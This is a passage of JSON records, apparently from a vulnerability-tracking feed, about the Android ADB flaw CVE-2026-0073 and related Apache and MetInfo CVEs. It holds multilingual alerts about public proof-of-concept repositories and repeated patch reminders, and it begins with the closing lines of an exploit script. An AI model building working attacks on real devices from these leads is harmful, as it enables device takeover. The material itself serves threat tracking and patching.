{KEY_TYPES}\")\n sys.exit(1)\n\n exploit(ip, port, cmd, key_type, verbose)\n\n\nif __name__ == \"__main__\":\n main()\n", "creation_timestamp": "2026-05-06T17:43:00.000000Z"}, {"uuid": "cdc44b36-54ad-4a6a-93b7-adf704ecee50", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-0073", "type": "seen", "source": "https://t.me/GithubRedTeam/83100", "content": "\ud83d\udea8 GitHub \u76d1\u63a7\u6d88\u606f\u63d0\u9192\n\n\ud83d\udea8 \u53d1\u73b0\u5173\u952e\u8bcd\uff1a #CVE-2026\n\n\ud83d\udce6 \u9879\u76ee\u540d\u79f0\uff1a Poc-CVE-2026-0073\n\ud83d\udc64 \u9879\u76ee\u4f5c\u8005\uff1a adityatelange\n\ud83d\udee0 \u5f00\u53d1\u8bed\u8a00\uff1a Python\n\u2b50 Star\u6570\u91cf\uff1a 0 | \ud83c\udf74 Fork\u6570\u91cf\uff1a 0\n\ud83d\udcc5 \u66f4\u65b0\u65f6\u95f4\uff1a 2026-05-06 17:58:20\n\n\ud83d\udcdd \u9879\u76ee\u63cf\u8ff0\uff1a\nCVE-2026-0073 - ADB Wireless Mutual Authentication Bypass PoC\n\n\ud83d\udd17 \u70b9\u51fb\u8bbf\u95ee\u9879\u76ee\u5730\u5740", "creation_timestamp": "2026-05-06T18:00:06.000000Z"}, {"uuid": "49ef6d2c-9b4a-4392-8c6d-5941ae2dfe8a", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-0073", "type": "seen", "source": "https://t.me/true_secator/8179", "content": "\u041f\u0440\u043e\u0434\u043e\u043b\u0436\u0430\u0435\u043c \u043e\u0442\u0441\u043b\u0435\u0436\u0438\u0432\u0430\u0442\u044c \u043d\u0430\u0438\u0431\u043e\u043b\u0435\u0435 \u0432\u0430\u0436\u043d\u044b\u0435 \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u0438 \u0438 \u0441\u0432\u044f\u0437\u0430\u043d\u043d\u044b\u0435 \u0441 \u043d\u0438\u043c\u0438 \u0443\u0433\u0440\u043e\u0437\u044b, \u043d\u0430 \u0442\u0435\u043a\u0443\u0449\u0438\u0439 \u043c\u043e\u043c\u0435\u043d\u0442 \u0441\u0438\u0442\u0443\u0430\u0446\u0438\u044f \u0441\u043b\u0435\u0434\u0443\u044e\u0449\u0430\u044f:\n\n1. \u0412 Android \u0438\u0441\u043f\u0440\u0430\u0432\u043b\u0435\u043d\u0430 \u043a\u0440\u0438\u0442\u0438\u0447\u0435\u0441\u043a\u0430\u044f RCE-\u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u044c, CVE-2026-0073, \u043a\u043e\u0442\u043e\u0440\u0430\u044f \u0437\u0430\u0442\u0440\u0430\u0433\u0438\u0432\u0430\u0435\u0442 \u0441\u0438\u0441\u0442\u0435\u043c\u043d\u044b\u0439 \u043a\u043e\u043c\u043f\u043e\u043d\u0435\u043d\u0442 \u041e\u0421 \u0438 \u043c\u043e\u0436\u0435\u0442 \u0431\u044b\u0442\u044c \u0438\u0441\u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u043d\u0430 \u0434\u043b\u044f \u0432\u044b\u043f\u043e\u043b\u043d\u0435\u043d\u0438\u044f \u043a\u043e\u0434\u0430 \u043e\u0442 \u0438\u043c\u0435\u043d\u0438 \u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u0442\u0435\u043b\u044f \u043a\u043e\u043c\u0430\u043d\u0434\u043d\u043e\u0439 \u043e\u0431\u043e\u043b\u043e\u0447\u043a\u0438 \u0431\u0435\u0437 \u0434\u043e\u043f\u043e\u043b\u043d\u0438\u0442\u0435\u043b\u044c\u043d\u044b\u0445 \u043f\u0440\u0438\u0432\u0438\u043b\u0435\u0433\u0438\u0439 \u043d\u0430 \u0432\u044b\u043f\u043e\u043b\u043d\u0435\u043d\u0438\u0435 \u0431\u0435\u0437 \u0432\u0437\u0430\u0438\u043c\u043e\u0434\u0435\u0439\u0441\u0442\u0432\u0438\u044f \u0441 \u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u0442\u0435\u043b\u0435\u043c.\u00a0\n\n\u041f\u0440\u043e\u0431\u043b\u0435\u043c\u0430 \u0437\u0430\u0442\u0440\u0430\u0433\u0438\u0432\u0430\u0435\u0442 adbd (Android Debug Bridge daemon), \u0444\u043e\u043d\u043e\u0432\u044b\u0439 \u043f\u0440\u043e\u0446\u0435\u0441\u0441, \u0440\u0430\u0431\u043e\u0442\u0430\u044e\u0449\u0438\u0439 \u043d\u0430 \u0443\u0441\u0442\u0440\u043e\u0439\u0441\u0442\u0432\u0430\u0445 Android \u0438 \u0443\u043f\u0440\u0430\u0432\u043b\u044f\u044e\u0449\u0438\u0439 \u0441\u0432\u044f\u0437\u044c\u044e \u043c\u0435\u0436\u0434\u0443 \u0443\u0441\u0442\u0440\u043e\u0439\u0441\u0442\u0432\u043e\u043c \u0438 \u043a\u043e\u043c\u043f\u044c\u044e\u0442\u0435\u0440\u043e\u043c, \u043e\u0431\u0435\u0441\u043f\u0435\u0447\u0438\u0432\u0430\u044f \u043e\u0442\u043b\u0430\u0434\u043a\u0443 \u0438 \u0434\u043e\u0441\u0442\u0443\u043f \u043a \u043a\u043e\u043c\u0430\u043d\u0434\u043d\u043e\u0439 \u043e\u0431\u043e\u043b\u043e\u0447\u043a\u0435.\n\n\u041f\u043e\u043a\u0430 \u043a\u0430\u043a\u0438\u0445-\u043b\u0438\u0431\u043e \u043f\u0440\u0438\u0437\u043d\u0430\u043a\u043e\u0432 \u0442\u043e\u0433\u043e, \u0447\u0442\u043e \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u044c CVE-2026-0073 \u0438\u0441\u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u043b\u0430\u0441\u044c \u0432 \u0432\u0440\u0435\u0434\u043e\u043d\u043e\u0441\u043d\u044b\u0445 \u0430\u0442\u0430\u043a\u0430\u0445 \u043d\u0435\u0442, \u043d\u043e \u044d\u0442\u043e \u0442\u043e\u043b\u044c\u043a\u043e \u043f\u043e\u043a\u0430.\n\n2. Apache \u0432\u044b\u043f\u0443\u0441\u0442\u0438\u043b\u0430 \u0438\u0441\u043f\u0440\u0430\u0432\u043b\u0435\u043d\u0438\u044f \u0434\u043b\u044f \u0431\u043e\u043b\u0435\u0435 \u0447\u0435\u043c \u0434\u0435\u0441\u044f\u0442\u043a\u0430 \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u0435\u0439 \u0432 HTTP Server \u0438 MINA, \u0432\u043a\u043b\u044e\u0447\u0430\u044f \u043a\u0440\u0438\u0442\u0438\u0447\u0435\u0441\u043a\u0438\u0435 \u0438 \u0441\u0435\u0440\u044c\u0435\u0437\u043d\u044b\u0435 \u043f\u0440\u043e\u0431\u043b\u0435\u043c\u044b, \u043a\u043e\u0442\u043e\u0440\u044b\u0435 \u043c\u043e\u0433\u043b\u0438 \u0431\u044b\u0442\u044c \u0438\u0441\u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u043d\u044b \u0434\u043b\u044f RCE.\n\n\u0412 Apache HTTP Server 2.4.67 \u0438\u0441\u043f\u0440\u0430\u0432\u043b\u0435\u043d\u043e \u0434\u043b\u044f 11 \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u0435\u0439, 10 \u0438\u0437 \u043a\u043e\u0442\u043e\u0440\u044b\u0445 \u0437\u0430\u0442\u0440\u0430\u0433\u0438\u0432\u0430\u044e\u0442 \u0432\u0441\u0435 \u043f\u0440\u0435\u0434\u044b\u0434\u0443\u0449\u0438\u0435 \u0432\u0435\u0440\u0441\u0438\u0438.\n\n\u041f\u0435\u0440\u0432\u0430\u044f \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u044c - CVE-2026-23918, \u043f\u0440\u0435\u0434\u0441\u0442\u0430\u0432\u043b\u044f\u0435\u0442 \u0441\u043e\u0431\u043e\u0439 \u043e\u0448\u0438\u0431\u043a\u0443 \u0434\u0432\u043e\u0439\u043d\u043e\u0433\u043e \u043e\u0441\u0432\u043e\u0431\u043e\u0436\u0434\u0435\u043d\u0438\u044f \u043f\u0430\u043c\u044f\u0442\u0438 \u0438 \u043f\u043e\u0442\u0435\u043d\u0446\u0438\u0430\u043b\u044c\u043d\u043e\u0435 \u0443\u0434\u0430\u043b\u0435\u043d\u043d\u043e\u0435 \u0432\u044b\u043f\u043e\u043b\u043d\u0435\u043d\u0438\u0435 \u043a\u043e\u0434\u0430 \u0432 \u043f\u0440\u043e\u0442\u043e\u043a\u043e\u043b\u0435 HTTP/2. \u0418\u043d\u0438\u0446\u0438\u0438\u0440\u0443\u044f \u043f\u0440\u0435\u0436\u0434\u0435\u0432\u0440\u0435\u043c\u0435\u043d\u043d\u043e\u0435 \u0441\u0431\u0440\u043e\u0441, \u0437\u043b\u043e\u0443\u043c\u044b\u0448\u043b\u0435\u043d\u043d\u0438\u043a \u043c\u043e\u0436\u0435\u0442 \u0432\u044b\u0437\u0432\u0430\u0442\u044c DoS \u0438 \u043f\u043e\u0442\u0435\u043d\u0446\u0438\u0430\u043b\u044c\u043d\u043e \u0432\u044b\u043f\u043e\u043b\u043d\u0438\u0442\u044c \u043f\u0440\u043e\u0438\u0437\u0432\u043e\u043b\u044c\u043d\u044b\u0439 \u043a\u043e\u0434.\n\n\u0414\u0440\u0443\u0433\u0430\u044f, CVE-2026-28780, \u043f\u0440\u043e\u0431\u043b\u0435\u043c\u0430 \u043f\u0435\u0440\u0435\u043f\u043e\u043b\u043d\u0435\u043d\u0438\u044f \u0431\u0443\u0444\u0435\u0440\u0430 \u0432 \u043a\u0443\u0447\u0435, \u043a\u043e\u0442\u043e\u0440\u0430\u044f \u043c\u043e\u0436\u0435\u0442 \u043f\u043e\u0437\u0432\u043e\u043b\u0438\u0442\u044c \u0443\u0434\u0430\u043b\u0435\u043d\u043d\u044b\u043c \u0437\u043b\u043e\u0443\u043c\u044b\u0448\u043b\u0435\u043d\u043d\u0438\u043a\u0430\u043c \u043e\u0442\u043f\u0440\u0430\u0432\u043b\u044f\u0442\u044c \u0441\u043f\u0435\u0446\u0438\u0430\u043b\u044c\u043d\u043e \u0441\u0444\u043e\u0440\u043c\u0438\u0440\u043e\u0432\u0430\u043d\u043d\u044b\u0435 AJP-\u0441\u043e\u043e\u0431\u0449\u0435\u043d\u0438\u044f, \u0432\u044b\u0437\u044b\u0432\u0430\u044f DoS \u0438 \u0432\u044b\u043f\u043e\u043b\u043d\u044f\u044f \u043a\u043e\u0434.\n\n\u0422\u0440\u0438 \u0434\u0440\u0443\u0433\u0438\u0445 \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u0438 \u0431\u0435\u0437\u043e\u043f\u0430\u0441\u043d\u043e\u0441\u0442\u0438, CVE-2026-29168, CVE-2026-29169 \u0438 CVE-2026-33007, \u043c\u043e\u0433\u0443\u0442 \u043f\u0440\u0438\u0432\u0435\u0441\u0442\u0438 \u043a DoS, \u0430 \u0435\u0449\u0435 \u0447\u0435\u0442\u044b\u0440\u0435 (CVE-2026-24072, CVE-2026-33857, CVE-2026-34032 \u0438 CVE-2026-34059) - \u043c\u043e\u0433\u0443\u0442 \u043f\u0440\u0438\u0432\u0435\u0441\u0442\u0438 \u043a \u0440\u0430\u0441\u043a\u0440\u044b\u0442\u0438\u044e \u0438\u043d\u0444\u043e\u0440\u043c\u0430\u0446\u0438\u0438.\n\n\u041e\u0431\u043d\u043e\u0432\u043b\u0435\u043d\u0438\u0435 \u0442\u0430\u043a\u0436\u0435 \u0443\u0441\u0442\u0440\u0430\u043d\u044f\u0435\u0442 \u043f\u0440\u043e\u0431\u043b\u0435\u043c\u0443 \u043d\u0435\u043a\u043e\u0440\u0440\u0435\u043a\u0442\u043d\u043e\u0439 \u043d\u0435\u0439\u0442\u0440\u0430\u043b\u0438\u0437\u0430\u0446\u0438\u0438 \u043f\u043e\u0441\u043b\u0435\u0434\u043e\u0432\u0430\u0442\u0435\u043b\u044c\u043d\u043e\u0441\u0442\u0435\u0439 CRLF (CVE-2026-33523), \u043a\u043e\u0442\u043e\u0440\u0430\u044f \u043f\u043e\u0437\u0432\u043e\u043b\u044f\u0435\u0442 \u043c\u0430\u043d\u0438\u043f\u0443\u043b\u0438\u0440\u043e\u0432\u0430\u0442\u044c HTTP-\u043e\u0442\u0432\u0435\u0442\u0430\u043c\u0438, \u0438 \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u044c, \u0441\u0432\u044f\u0437\u0430\u043d\u043d\u0443\u044e \u0441 \u0438\u0441\u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u043d\u0438\u0435\u043c \u043f\u043e\u0431\u043e\u0447\u043d\u044b\u0445 \u043a\u0430\u043d\u0430\u043b\u043e\u0432 \u043f\u043e \u0432\u0440\u0435\u043c\u0435\u043d\u0438 (CVE-2026-33006), \u043a\u043e\u0442\u043e\u0440\u0430\u044f \u043c\u043e\u0436\u0435\u0442 \u043f\u0440\u0438\u0432\u0435\u0441\u0442\u0438 \u043a \u043e\u0431\u0445\u043e\u0434\u0443 \u0430\u0443\u0442\u0435\u043d\u0442\u0438\u0444\u0438\u043a\u0430\u0446\u0438\u0438 Digest.\n\n\u041a\u0440\u043e\u043c\u0435 \u0442\u043e\u0433\u043e, Apache\u00a0\u043e\u0431\u044a\u044f\u0432\u0438\u043b\u0430\u00a0\u043e \u0432\u044b\u043f\u0443\u0441\u043a\u0435 \u043e\u0431\u043d\u043e\u0432\u043b\u0435\u043d\u0438\u0439 MINA 2.2.7 \u0438 MINA 2.1.12, \u0441\u043e\u0434\u0435\u0440\u0436\u0430\u0449\u0438\u0445 \u0438\u0441\u043f\u0440\u0430\u0432\u043b\u0435\u043d\u0438\u044f \u0434\u043b\u044f \u0434\u0432\u0443\u0445 \u043a\u0440\u0438\u0442\u0438\u0447\u0435\u0441\u043a\u0438\u0445 \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u0435\u0439 - CVE-2026-42778 \u0438 CVE-2026-42779. \n\n\u041f\u0435\u0440\u0432\u0430\u044f - \u044d\u0442\u043e \u043d\u0435\u043f\u043e\u043b\u043d\u043e\u0435 \u0438\u0441\u043f\u0440\u0430\u0432\u043b\u0435\u043d\u0438\u0435 \u0434\u043b\u044f CVE-2026-41409, \u043a\u043e\u0442\u043e\u0440\u0430\u044f, \u0432 \u0441\u0432\u043e\u044e \u043e\u0447\u0435\u0440\u0435\u0434\u044c, \u044f\u0432\u043b\u044f\u0435\u0442\u0441\u044f \u043d\u0435\u043f\u043e\u043b\u043d\u044b\u043c \u0438\u0441\u043f\u0440\u0430\u0432\u043b\u0435\u043d\u0438\u0435\u043c \u0434\u043b\u044f CVE-2024-52046, \u043d\u0435\u0431\u0435\u0437\u043e\u043f\u0430\u0441\u043d\u043e\u0439 \u0434\u0435\u0441\u0435\u0440\u0438\u0430\u043b\u0438\u0437\u0430\u0446\u0438\u0438 \u0434\u0430\u043d\u043d\u044b\u0445, \u043a\u043e\u0442\u043e\u0440\u0430\u044f \u043c\u043e\u0436\u0435\u0442 \u0431\u044b\u0442\u044c \u0438\u0441\u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u043d\u0430 \u0434\u043b\u044f RCE.\n\n\u0412\u0442\u043e\u0440\u0430\u044f - \u043d\u0435\u043f\u043e\u043b\u043d\u043e\u0435 \u0438\u0441\u043f\u0440\u0430\u0432\u043b\u0435\u043d\u0438\u0435 \u0434\u043b\u044f CVE-2026-41635, \u043f\u0440\u0435\u0434\u0441\u0442\u0430\u0432\u043b\u044f\u044e\u0449\u0435\u0439 \u0441\u043e\u0431\u043e\u0439 \u043d\u0435\u043a\u043e\u0440\u0440\u0435\u043a\u0442\u043d\u0443\u044e \u043e\u0448\u0438\u0431\u043a\u0443 \u043f\u0440\u043e\u0432\u0435\u0440\u043a\u0438, \u043f\u0440\u0438\u0432\u043e\u0434\u044f\u0449\u0443\u044e \u043a \u043e\u0431\u0445\u043e\u0434\u0443 \u0441\u043f\u0438\u0441\u043a\u0430 \u0440\u0430\u0437\u0440\u0435\u0448\u0435\u043d\u043d\u044b\u0445 \u043e\u0431\u044a\u0435\u043a\u0442\u043e\u0432 \u0438 \u0432\u044b\u043f\u043e\u043b\u043d\u0435\u043d\u0438\u044e \u043a\u043e\u0434\u0430.\n\n3. VulnCheck \u0441\u043e\u043e\u0431\u0449\u0430\u0435\u0442, \u0447\u0442\u043e \u0437\u043b\u043e\u0443\u043c\u044b\u0448\u043b\u0435\u043d\u043d\u0438\u043a\u0438 \u0430\u043a\u0442\u0438\u0432\u043d\u043e \u0438\u0441\u043f\u043e\u043b\u044c\u0437\u0443\u044e\u0442 \u043a\u0440\u0438\u0442\u0438\u0447\u0435\u0441\u043a\u0443\u044e CVE-2026-29014\u00a0(CVSS: 9,8) \u0432 CMS \u0441 \u043e\u0442\u043a\u0440\u044b\u0442\u044b\u043c \u0438\u0441\u0445\u043e\u0434\u043d\u044b\u043c \u043a\u043e\u0434\u043e\u043c MetInfo.\n\n\u041e\u043d\u0430 \u0437\u0430\u0442\u0440\u0430\u0433\u0438\u0432\u0430\u0435\u0442 MetInfo CMS 7.9, 8.0 \u0438 8.1 \u0438 \u043f\u043e\u0437\u0432\u043e\u043b\u044f\u0435\u0442 \u0443\u0434\u0430\u043b\u0435\u043d\u043d\u044b\u043c \u0437\u043b\u043e\u0443\u043c\u044b\u0448\u043b\u0435\u043d\u043d\u0438\u043a\u0430\u043c \u0432\u044b\u043f\u043e\u043b\u043d\u044f\u0442\u044c \u043f\u0440\u043e\u0438\u0437\u0432\u043e\u043b\u044c\u043d\u044b\u0439 \u043a\u043e\u0434, \u043e\u0442\u043f\u0440\u0430\u0432\u043b\u044f\u044f \u0441\u043f\u0435\u0446\u0438\u0430\u043b\u044c\u043d\u043e \u0441\u0444\u043e\u0440\u043c\u0438\u0440\u043e\u0432\u0430\u043d\u043d\u044b\u0435 \u0437\u0430\u043f\u0440\u043e\u0441\u044b \u0441\u043e \u0432\u0440\u0435\u0434\u043e\u043d\u043e\u0441\u043d\u044b\u043c PHP-\u043a\u043e\u0434\u043e\u043c.\n\n\u0417\u043b\u043e\u0443\u043c\u044b\u0448\u043b\u0435\u043d\u043d\u0438\u043a\u0438 \u043c\u043e\u0433\u0443\u0442 \u0438\u0441\u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u0442\u044c \u043d\u0435\u0434\u043e\u0441\u0442\u0430\u0442\u043e\u0447\u043d\u0443\u044e \u043d\u0435\u0439\u0442\u0440\u0430\u043b\u0438\u0437\u0430\u0446\u0438\u044e \u0432\u0445\u043e\u0434\u043d\u044b\u0445 \u0434\u0430\u043d\u043d\u044b\u0445 \u0432 \u043f\u0440\u043e\u0446\u0435\u0441\u0441\u0435 \u0432\u044b\u043f\u043e\u043b\u043d\u0435\u043d\u0438\u044f \u043a\u043e\u0434\u0430 \u0434\u043b\u044f RCE \u0438 \u043f\u043e\u043b\u0443\u0447\u0435\u043d\u0438\u044f \u043f\u043e\u043b\u043d\u043e\u0433\u043e \u043a\u043e\u043d\u0442\u0440\u043e\u043b\u044f \u043d\u0430\u0434 \u0437\u0430\u0442\u0440\u043e\u043d\u0443\u0442\u044b\u043c \u0441\u0435\u0440\u0432\u0435\u0440\u043e\u043c.", "creation_timestamp": "2026-05-06T18:50:06.000000Z"}, {"uuid": "b20894a1-f930-422d-a49f-2a75b7711e9b", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-0073", "type": "published-proof-of-concept", "source": "https://t.me/GithubRedTeam/83167", "content": "\ud83d\udea8 GitHub \u76d1\u63a7\u6d88\u606f\u63d0\u9192\n\n\ud83d\udea8 \u53d1\u73b0\u5173\u952e\u8bcd\uff1a #CVE-2026\n\n\ud83d\udce6 \u9879\u76ee\u540d\u79f0\uff1a adbHijacker\n\ud83d\udc64 \u9879\u76ee\u4f5c\u8005\uff1a unnaim\n\ud83d\udee0 \u5f00\u53d1\u8bed\u8a00\uff1a Python\n\u2b50 Star\u6570\u91cf\uff1a 0 | \ud83c\udf74 Fork\u6570\u91cf\uff1a 0\n\ud83d\udcc5 \u66f4\u65b0\u65f6\u95f4\uff1a 2026-05-07 04:59:23\n\n\ud83d\udcdd \u9879\u76ee\u63cf\u8ff0\uff1a\nA PoC tool for the CVE-2026-0073 on android 11+ devices which allows instant zero click RCE on any unpatched device with adb over tcp enabled\n\n\ud83d\udd17 \u70b9\u51fb\u8bbf\u95ee\u9879\u76ee\u5730\u5740", "creation_timestamp": "2026-05-07T05:00:04.000000Z"}, {"uuid": "edcc4f9e-1702-4e76-b239-b439db8e9343", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-0073", "type": "seen", "source": "https://t.me/CyberSecurityIL/84347", "content": "\u05e9\u05d9\u05de\u05d5 \u05dc\u05d1 \u05dc\u05d7\u05d5\u05dc\u05e9\u05d4 \u05e7\u05e8\u05d9\u05d8\u05d9\u05ea \u05d1-Android \u05d4\u05de\u05d0\u05e4\u05e9\u05e8\u05ea \u05dc\u05ea\u05d5\u05e7\u05e4\u05d9\u05dd \u05dc\u05d1\u05e6\u05e2 \u05de\u05ea\u05e7\u05e4\u05ea Zero-Click, \u05d5\u05dc\u05d4\u05e9\u05d9\u05d2 \u05d2\u05d9\u05e9\u05d4 \u05dc\u05d8\u05dc\u05e4\u05d5\u05df \u05de\u05d1\u05dc\u05d9 \u05e9\u05d4\u05de\u05e9\u05ea\u05de\u05e9 \u05e0\u05d3\u05e8\u05e9 \u05dc\u05d1\u05e6\u05e2 \u05e4\u05e2\u05d5\u05dc\u05d4 \u05db\u05dc\u05e9\u05d4\u05d9.\n\n\u05ea\u05d9\u05e7\u05d5\u05df \u05dc\u05d7\u05d5\u05dc\u05e9\u05d4 CVE-2026-0073 \u05e9\u05d5\u05d7\u05e8\u05e8 \u05d1\u05e2\u05d3\u05db\u05d5\u05df \u05e9\u05dc \u05de\u05d0\u05d9 2026. \u05d0\u05da \u05e0\u05e8\u05d0\u05d4 \u05e9\u05d4\u05e2\u05d3\u05db\u05d5\u05df \u05e2\u05d3\u05d9\u05d9\u05df \u05dc\u05d0 \u05d4\u05d2\u05d9\u05e2 \u05dc\u05db\u05dc \u05d4\u05de\u05db\u05e9\u05d9\u05e8\u05d9\u05dd.\n\nhttps://t.me/CyberSecurityIL/8888", "creation_timestamp": "2026-05-07T05:49:40.000000Z"}, {"uuid": "672f70fa-b3cb-4343-b7f9-cd5f2a1d85c5", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-0073", "type": "seen", "source": "https://t.me/GithubRedTeam/83176", "content": "\ud83d\udea8 GitHub \u76d1\u63a7\u6d88\u606f\u63d0\u9192\n\n\ud83d\udea8 \u53d1\u73b0\u5173\u952e\u8bcd\uff1a #CVE-2026\n\n\ud83d\udce6 \u9879\u76ee\u540d\u79f0\uff1a CVE-2026-0073-poc\n\ud83d\udc64 \u9879\u76ee\u4f5c\u8005\uff1a u33pk\n\ud83d\udee0 \u5f00\u53d1\u8bed\u8a00\uff1a Shell\n\u2b50 Star\u6570\u91cf\uff1a 0 | \ud83c\udf74 Fork\u6570\u91cf\uff1a 0\n\ud83d\udcc5 \u66f4\u65b0\u65f6\u95f4\uff1a 2026-05-07 07:49:04\n\n\ud83d\udcdd \u9879\u76ee\u63cf\u8ff0\uff1a\n\u65e0\u63cf\u8ff0\n\n\ud83d\udd17 \u70b9\u51fb\u8bbf\u95ee\u9879\u76ee\u5730\u5740", "creation_timestamp": "2026-05-07T08:00:04.000000Z"}, {"uuid": "39c899ae-2726-468a-bd54-4f00ad866103", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-0073", "type": "seen", "source": "https://bsky.app/profile/sergioiker.bsky.social/post/3mlblvibk6c2m", "content": "4/ \ud83d\udd10 Critical patches this week: CVE-2026-29014 (MetInfo, CVSS 9.8, actively exploited). CVE-2026-0073 (Android zero-click RCE). Palo Alto PAN-OS zero-day being exploited by state actors. Patch. Now.", "creation_timestamp": "2026-05-07T16:06:36.031591Z"}, {"uuid": "b0279846-a41c-4a91-9c9c-97d59876aeae", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-0073", "type": "seen", "source": "https://bsky.app/profile/sergioiker.bsky.social/post/3mlblvibsxk2m", "content": "4/ \ud83d\udd10 Critical patches this week: CVE-2026-29014 (MetInfo, CVSS 9.8, actively exploited). CVE-2026-0073 (Android zero-click RCE). Palo Alto PAN-OS zero-day being exploited by state actors. Patch. Now.", "creation_timestamp": "2026-05-07T16:06:36.758938Z"}, {"uuid": "bb97d229-c3e6-4136-bbf2-e8c306f28c8c", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-0073", "type": "seen", "source": "https://bsky.app/profile/sergioiker.bsky.social/post/3mlblvibtws2m", "content": "4/ \ud83d\udd10 Critical patches this week: CVE-2026-29014 (MetInfo, CVSS 9.8, actively exploited). CVE-2026-0073 (Android zero-click RCE). Palo Alto PAN-OS zero-day being exploited by state actors. Patch. Now.", "creation_timestamp": "2026-05-07T16:06:37.421195Z"}, {"uuid": "aa894c65-4c2d-4beb-800c-485ffb2456d0", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-0073", "type": "seen", "source": "https://bsky.app/profile/sergioiker.bsky.social/post/3mlblvibuw22m", "content": "4/ \ud83d\udd10 Critical patches this week: CVE-2026-29014 (MetInfo, CVSS 9.8, actively exploited). CVE-2026-0073 (Android zero-click RCE). Palo Alto PAN-OS zero-day being exploited by state actors. Patch. Now.", "creation_timestamp": "2026-05-07T16:06:40.066545Z"}, {"uuid": "47c87132-b592-400d-ad22-1ea6b39bd32f", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-0073", "type": "seen", "source": "https://bsky.app/profile/sergioiker.bsky.social/post/3mlblvibvvc2m", "content": "4/ \ud83d\udd10 Critical patches this week: CVE-2026-29014 (MetInfo, CVSS 9.8, actively exploited). CVE-2026-0073 (Android zero-click RCE). Palo Alto PAN-OS zero-day being exploited by state actors. Patch. Now.", "creation_timestamp": "2026-05-07T16:06:40.867755Z"}, {"uuid": "7193471c-0615-400a-af56-6f2dc7753269", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-0073", "type": "seen", "source": "https://bsky.app/profile/sergioiker.bsky.social/post/3mlblvibwuk2m", "content": "4/ \ud83d\udd10 Critical patches this week: CVE-2026-29014 (MetInfo, CVSS 9.8, actively exploited). CVE-2026-0073 (Android zero-click RCE). Palo Alto PAN-OS zero-day being exploited by state actors. Patch. Now.", "creation_timestamp": "2026-05-07T16:06:41.643027Z"}, {"uuid": "cb56d539-3554-45ce-a284-a300f945747d", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-0073", "type": "seen", "source": "https://bsky.app/profile/sergioiker.bsky.social/post/3mlblvibxts2m", "content": "4/ \ud83d\udd10 Critical patches this week: CVE-2026-29014 (MetInfo, CVSS 9.8, actively exploited). CVE-2026-0073 (Android zero-click RCE). Palo Alto PAN-OS zero-day being exploited by state actors. Patch. Now.", "creation_timestamp": "2026-05-07T16:06:42.372421Z"}, {"uuid": "cb65fa08-77bf-4eb6-8791-d2b4bf60e2dd", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-0073", "type": "seen", "source": "https://bsky.app/profile/sergioiker.bsky.social/post/3mlblvibxtt2m", "content": "4/ \ud83d\udd10 Critical patches this week: CVE-2026-29014 (MetInfo, CVSS 9.8, actively exploited). CVE-2026-0073 (Android zero-click RCE). Palo Alto PAN-OS zero-day being exploited by state actors. Patch. Now.", "creation_timestamp": "2026-05-07T16:06:43.133970Z"}, {"uuid": "552e538e-d0f5-4f42-a572-7fb2f39d39c6", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-0073", "type": "seen", "source": "https://bsky.app/profile/sergioiker.bsky.social/post/3mlblvibyt32m", "content": "4/ \ud83d\udd10 Critical patches this week: CVE-2026-29014 (MetInfo, CVSS 9.8, actively exploited). CVE-2026-0073 (Android zero-click RCE). Palo Alto PAN-OS zero-day being exploited by state actors. Patch. Now.", "creation_timestamp": 